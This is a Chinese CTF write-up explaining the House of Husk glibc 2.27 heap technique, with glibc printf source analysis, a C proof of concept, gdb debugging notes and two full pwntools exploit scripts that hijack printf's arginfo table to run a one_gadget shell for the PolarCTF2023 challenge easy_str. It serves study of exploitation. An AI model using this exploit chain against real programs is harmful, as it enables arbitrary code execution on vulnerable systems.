House Of Husk 搭配格式化字符串的堆利用全新理解

First Post:

Last Update:

Word Count:
2.8k

Read Time:
13 min

Page View: loading...

House Of Husk

前言:在打PolarCTF2023 冬季个人挑战赛时遇到一个堆题,题目叫做easy_str,一开始以为是个格式化字符串题目,但实际上是个堆题,题目也很特殊,只能申请大小大于0x500的chunk,特此赛后复盘学习以下该题目,以及这个题目所用到的技巧

攻击原理

这种攻击方式主要是利用了printf的一个调用链,应用场景是只能分配较大chunk时(超过fastbin),存在或可以构造出UAF漏洞。

首先从源码角度简单分析攻击背后的原理。在使用printf类格式化字符串函数进行输出的时候,该类函数会根据我们格式化字符串的种类不同而采取不同的输出格式进行输出,在glibc中有这样一个函数__register_printf_function,为格式化字符为spec的格式化输出注册函数,这个函数是__register_printf_specifier函数的封装。

跟进__register_printf_specifier函数,如果格式化符超过0xff或小于0,即不在ascii码则返回-1,如果__printf_arginfo_table为空就通过calloc分配堆内存存放__printf_arginfo_table以及__printf_function_table。两个表空间都为0x100,可以为0-0xff的每个字符注册一个函数指针,第一个表后面紧接着第二个表。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
/* Register FUNC to be called to format SPEC specifiers.  */
int
__register_printf_function (int spec, printf_function converter,
printf_arginfo_function arginfo)
{
return __register_printf_specifier (spec, converter,
(printf_arginfo_size_function*) arginfo);
}
/* Register FUNC to be called to format SPEC specifiers. */
int
__register_printf_specifier (int spec, printf_function converter,
printf_arginfo_size_function arginfo)
{
if (spec < 0 || spec > (int) UCHAR_MAX)
{
__set_errno (EINVAL);
return -1;
}

int result = 0;
__libc_lock_lock (lock);

if (__printf_function_table == NULL)
{
__printf_arginfo_table = (printf_arginfo_size_function **)
calloc (UCHAR_MAX + 1,sizeof (void *) * 2);
if (__printf_arginfo_table == NULL)
{
result = -1;
goto out;
}

__printf_function_table = (printf_function **)
(__printf_arginfo_table + UCHAR_MAX + 1);
}

__printf_function_table[spec] = converter;
__printf_arginfo_table[spec] = arginfo;

out:
__libc_lock_unlock (lock);

return result;
}

__printf_function_tablespec索引处的类型为printf_function的函数指针是我们为chr(spec)这个格式化字符注册的输出函数的函数指针,这个函数在printf->vfprintf->printf_positional中被调用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
/* Type of a printf specifier-handler function.
STREAM is the FILE on which to write output.
INFO gives information about the format specification.
ARGS is a vector of pointers to the argument data;
the number of pointers will be the number returned
by the associated arginfo function for the same INFO.
The function should return the number of characters written,
or -1 for errors. */
typedef intprintf_function (FILE *__stream,
conststruct printf_info *__info,
const void *const *__args);

//glibc-2.27/vfprintf.c:1985
extern printf_function **__printf_function_table;
int function_done;

if (spec <= UCHAR_MAX
&& __printf_function_table != NULL
&& __printf_function_table[(size_t) spec] != NULL)
{
const void **ptr = alloca (specs[nspecs_done].ndata_args
*sizeof (const void *));

/* Fill in an array of pointers to the argument values. */
for (unsigned int i = 0; i < specs[nspecs_done].ndata_args;
++i)
ptr[i] = &args_value[specs[nspecs_done].data_arg + i];

/* Call the function. */
function_done = __printf_function_table[(size_t) spec]
(s, &specs[nspecs_done].info, ptr);

if (function_done != -2)
{
/* If an error occurred we don't have information
about # of chars. */
if (function_done < 0)
{
/* Function has set errno. */
done = -1;
goto all_done;
}

done_add (function_done);
break;
}
}

__printf_arginfo_tablespec索引处的类型为printf_arginfo_size_function的函数指针是我们为chr(spec)这个格式化字符注册的输出函数的另一个函数指针,这个函数在printf->vfprintf->printf_positional->__parse_one_specmb中被调用。可以看到其返回值为格式化字符消耗的参数个数,猜测其功能是根据格式化字符做解析。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
/* Type of a printf specifier-arginfo function.
INFO gives information about the format specification.
N, ARGTYPES, *SIZE has to contain the size of the parameter for
user-defined types, and return value are as for parse_printf_format
except that -1 should be returned if the handler cannot handle
this case. This allows to partially overwrite the functionality
of existing format specifiers. */
typedef intprintf_arginfo_size_function (conststruct printf_info *__info,
size_t __n, int *__argtypes,
int *__size);

//glibc-2.27/printf-parsemb.c:307

/* Get the format specification. */
spec->info.spec = (wchar_t) *format++;
spec->size = -1;
if (__builtin_expect (__printf_function_table == NULL, 1)
|| spec->info.spec > UCHAR_MAX
|| __printf_arginfo_table[spec->info.spec] == NULL
/* We don't try to get the types for all arguments if the format
uses more than one. The normal case is covered though. If
the call returns -1 we continue with the normal specifiers. */
|| (int) (spec->ndata_args = (*__printf_arginfo_table[spec->info.spec])
(&spec->info, 1, &spec->data_arg_type,
&spec->size)) < 0)
{
/* Find the data argument types of a built-in spec. */
spec->ndata_args = 1;

structprintf_spec
{
/* Information parsed from the format spec. */
structprintf_infoinfo;
/* Pointers into the format string for the end of this format
spec and the next (or to the end of the string if no more). */
const UCHAR_T *end_of_fmt, *next_fmt;
/* Position of arguments for precision and width, or -1 if `info' has
the constant value. */
int prec_arg, width_arg;
int data_arg; /* Position of data argument. */
int data_arg_type; /* Type of first argument. */
/* Number of arguments consumed by this format specifier. */
size_t ndata_args;
/* Size of the parameter for PA_USER type. */
int size;
};

此外,在vfprintf函数中如果检测到我们注册的table不为空,则对于格式化字符不走默认的输出函数而是调用printf_positional函数,进而可以调用到表中的函数指针。

至此,两个调用链的分析就完成了,我们再来结合poc分析一下今天要谈论的攻击方式是如何和printf结合的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
//glibc-2.27/vfprintf.c:1335
/* Use the slow path in case any printf handler is registered. */
if (__glibc_unlikely (__printf_function_table != NULL
|| __printf_modifier_table != NULL
|| __printf_va_arg_table != NULL))
goto do_positional;

/* Hand off processing for positional parameters. */

do_positional:
if (__glibc_unlikely (workstart != NULL))
{
free (workstart);
workstart = NULL;
}
done = printf_positional (s, format, readonly_format, ap, &ap_save,
done, nspecs_done, lead_str_end, work_buffer,
save_errno, grouping, thousands_sep);

poc分析

这里使用的poc就直接用攻击发现者提供的源代码,运行环境为ubuntu 18.04/glibc 2.27,编译命令为gcc ./poc.c -g -fPIE -no-pie -o poc(关闭pie方便调试)。

代码模拟了UAF漏洞,先分配一个超过fastbin的块,释放之后会进入unsorted bin。预先分配两个chunk,第一个用来伪造__printf_function_table,第二个用来伪造__printf_arginfo_table。将__printf_arginfo_table['X']处的函数指针改为one_gadget

使用unsorted bin attack改写global_max_fastmain_arena+88从而使得释放的所有块都按fastbin处理(都是超过large bin大小的堆块不会进tcache)。

在这里有一个很重要的知识就是fastbin的堆块地址会存放在main_arena中,从main_arena+8开始存放fastbin[0x20]的头指针,一直往后推,由于平时的fastbin默认阈值为0x80,所以在glibc-2.23的环境下最多存放到main_arena+0x48,现在我们将阈值改为0x7f*导致几乎所有sz的chunk都被当做fastbin,其地址会从main_arena+8开始,根据sz不同往libc覆写堆地址。如此一来,只要我们计算好__printf_arginfo_tablemain_arena的地址偏移,进而得到合适的sz,就可以在之后释放这个伪造table的chunk时覆写__printf_arginfo_tableheap_addr。这种利用方式在*CTF2019->heap_master的题解中我曾经使用过,详情可以参见Star CTF heap_master的1.2.4.3

有了上述知识铺垫,整个攻击流程就比较清晰了,总结一下,先UAF改global_max_fast为main_arena+88,之后释放合适sz的块到fastbin,从而覆写__printf_arginfo_table表为heap地址,heap['X']被覆写为了one_gadget,在调用这个函数指针时即可get shell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
/**
* This is a Proof-of-Concept for House of Husk
* This PoC is supposed to be run with libc-2.27.
*/
#include <stdio.h>#include <stdlib.h>#define offset2size(ofs) ((ofs) * 2 - 0x10)
#define MAIN_ARENA 0x3ebc40
#define MAIN_ARENA_DELTA 0x60
#define GLOBAL_MAX_FAST 0x3ed940
#define PRINTF_FUNCTABLE 0x3f0658
#define PRINTF_ARGINFO 0x3ec870
#define ONE_GADGET 0x10a38c

intmain (void)
{
unsigned long libc_base;
char *a[10];
setbuf(stdout, NULL); // make printf quiet

/* leak libc */
a[0] = malloc(0x500); /* UAF chunk */
a[1] = malloc(offset2size(PRINTF_FUNCTABLE - MAIN_ARENA));
a[2] = malloc(offset2size(PRINTF_ARGINFO - MAIN_ARENA));
a[3] = malloc(0x500); /* avoid consolidation */
free(a[0]);
libc_base = *(unsigned long*)a[0] - MAIN_ARENA - MAIN_ARENA_DELTA;
printf("libc @ 0x%lxn", libc_base);

/* prepare fake printf arginfo table */
*(unsigned long*)(a[2] + ('X' - 2) * 8) = libc_base + ONE_GADGET;
//*(unsigned long*)(a[1] + ('X' - 2) * 8) = libc_base + ONE_GADGET;
//now __printf_arginfo_table['X'] = one_gadget;

/* unsorted bin attack */
*(unsigned long*)(a[0] + 8) = libc_base + GLOBAL_MAX_FAST - 0x10;
a[0] = malloc(0x500); /* overwrite global_max_fast */

/* overwrite __printf_arginfo_table and __printf_function_table */
free(a[1]);// __printf_function_table => a heap_addr which is not NULL
free(a[2]);//__printf_arginfo_table => one_gadget

/* ignite! */
printf("%X", 0);

return 0;
}

动态分析

glibc的调试我们用的比较多了,在涉及到库函数的时候最好结合源码进行调试,在glibc下载这里下载源码,解压之后使用directory添加源码目录

1
2
3
4
b* 0x400774
directory ~/Desktop/CTF/glibc-2.27/stdio-common
r
parseheap

在printf下断点,可以看到此时__printf_arginfo_table伪造完成,我们使用rwatch *0x60be50下内存断点,继续运行。

image.png

单步进入si进入printf

image.png

下一个调用函数

image-20231210185336964

下一步调用

image.png

可以看到运行到了__parse_one_specmb函数,再跟进两步,发现最终调用了rax寄存器里的 one_gadget

image.png

image.png

扩展

当然,除了覆写第二个table外,改第一个一样可以get shell,流程和调试我们已经讲的差不多了,这里只需把one_gadget赋值代码改为*(unsigned long*)(a[1] + ('X' - 2) * 8) = libc_base + ONE_GADGET;即可,我们用同样方式在gdb下调试poc并设置硬件断点

continue继续,可以看到在printf_positional断住,跟进两步,最终调用了rax里的`one_gadget

例题: PolarCTF2023 冬季个人挑战赛 easy_str

查看题目信息**

1
$file easy_str$checksec easy_str

利用 unsorted bin attackglobal_max_fast 改为 main_arena->top,后面释放的 chunk 会进入 fastbinY 数组。通过 fastbinY 越界利用将__printf_arginfo_table 对应的 spec 改为 one_gadget。最后通过调用 printf("%X",0) 来触发 one_gadget

1
2
3
4
5
6
def get_shell():    
edit(0, p64(libc_addr+0x3ed940-0x10)*2)
edit(2, b'a'*((0x58-2)*8) + p64(libc_addr+0x10a2fc))
add(0x500) # 4
dele(2)
dele(1)

EXP**

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#pwn()

#远程
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context.binary = './easy_str.easy_str'
context.log_level = 'debug'

# io = remote('120.46.59.242', 2131)
io = process('./easy_str.easy_str')
elf = ELF('./easy_str.easy_str')
libc = ELF('./libc-2.27.so')
one_gadgets = [0x4f2a5, 0x4f302, 0x10a2fc]

def debug(gdbscript="", stop=False):
if isinstance(io, process):
gdb.attach(io, gdbscript=gdbscript)
if stop:
pause()

stop = pause
S = pause
leak = lambda name, address: log.info("{} ===> {}".format(name, hex(address)))
s = io.send
sl = io.sendline
sla = io.sendlineafter
sa = io.sendafter
slt = io.sendlinethen
st = io.sendthen
r = io.recv
rn = io.recvn
rr = io.recvregex
ru = io.recvuntil
ra = io.recvall
rl = io.recvline
rs = io.recvlines
rls = io.recvline_startswith
rle = io.recvline_endswith
rlc = io.recvline_contains
ia = io.interactive
ic = io.close
cr = io.can_recv

def cmd(i):
sla(b'choice: \\n', i)

def add(size):
cmd(b'1')
sla(b'size:\\n', str(size).encode())

def edit(idx, content):
cmd(b'2')
sla(b'id:\\n', str(idx).encode())
sl(content)

def show(idx):
cmd(b'3')
sla(b'id:\\n', str(idx).encode())
ru(b'output\\n')

def dele(idx):
cmd(b'4')
sla(b'id:\\n', str(idx).encode())

def get_libc():
global libc_addr
add(0x500) # 0
add(0x4af8*2-0x10) # 1
add(0xC30*2-0x10) # 2
add(0x500) # 3

dele(0)
show(0)

libc_addr = u64(r(6).ljust(0x8, b'\\x00'))-0x3ebca0
leak("libc_addr", libc_addr)
leak("onegadget", libc_addr+0x10a2fc)

def get_shell():
edit(0, p64(libc_addr+0x3ed940-0x10)*2)
edit(2, b'a'*((0x58-2)*8) + p64(libc_addr+0x10a2fc)) #这里打2打1都可以
add(0x500) # 4
dele(2)
dele(1)

def pwn():
get_libc()
get_shell()
ia()

if __name__ == '__main__':
pwn()

打本地,我的libc版本是2.27-3ubuntu1_amd64

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
from pwn import *
from LibcSearcher import LibcSearcher
context(log_level = "debug",arch = "amd64")
file_name='./easy_str.easy_str'
ld_name='/mnt/e/CTF/PWN/tools/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/ld-2.27.so'
# libc_name='/mnt/e/CTF/PWN/tools/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6'
libc_name = './libc-2.27.so'

def connect():
global p,elf,libc
local = 0
if local:
# p = process([ld_name, file_name], env={"LD_PRELOAD":libc_name})
p = process(file_name)
else:
p = remote("120.46.59.242",2131 )
elf = ELF(file_name)
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc = ELF("/mnt/e/CTF/PWN/tools/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so")
# libc = ELF(libc_name)

s = lambda data :p.send(data)
sl = lambda data :p.sendline(data)
sa = lambda x,data :p.sendafter(x, data)
sla = lambda x,data :p.sendlineafter(x, data)
r = lambda n :p.recv(n)
rl = lambda n :p.recvline(n)
ru = lambda x :p.recvuntil(x, drop = True)
r = lambda x :p.recv(x)
uu64 = lambda :u64(p.recvuntil(b'\\x7f')[-6:].ljust(8,b'\\x00'))
itr = lambda :p.interactive()
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))

def dbg(addr):
gdb.attach(sh,'b *0x{}\\nc\\n'.format(addr))

def db():
gdb.attach(p)

def meau(idx):
ru("choice: \\n")
sl(str(idx))

def edit(idx,content):
meau(2)
sla("id:\\n",str(idx))
s(content)

def add(size):
meau(1)
sla("size:\\n",str(size))

def show(idx):
meau(3)
sla("id:",str(idx))

def delete(idx):
meau(4)
sla("id:",str(idx))

#define offset2size(ofs) ((ofs) * 2 - 0x10)
MAIN_ARENA = 0x3ebc40
MAIN_ARENA_DELTA = 0x60
GLOBAL_MAX_FAST = 0x3ed940
PRINTF_FUNCTABLE = 0x3f0658
PRINTF_ARGINFO = 0x3ec870
ONE_GADGET = 0x10a38c

def pwn():
add(0x500) #0
add((PRINTF_FUNCTABLE-MAIN_ARENA)*2-0x10) #1
add((PRINTF_ARGINFO-MAIN_ARENA)*2-0x10) #2
add(0x500) #3

delete(0)
show(0)
ru("output\\n")

libc_base = u64(p.recv(6).ljust(8,b'\\x00')) - MAIN_ARENA - MAIN_ARENA_DELTA
lg("libc_base",libc_base)

pay0 = p64(0)*86 + p64(libc_base+ONE_GADGET)
edit(2,pay0)

#修改global_max_fast
pay1 = p64(0) + p64(libc_base + GLOBAL_MAX_FAST-0x10)
edit(0,pay1)
add(0x500) #0

delete(2)
delete(1)

# meau(666)
# db()
p.interactive()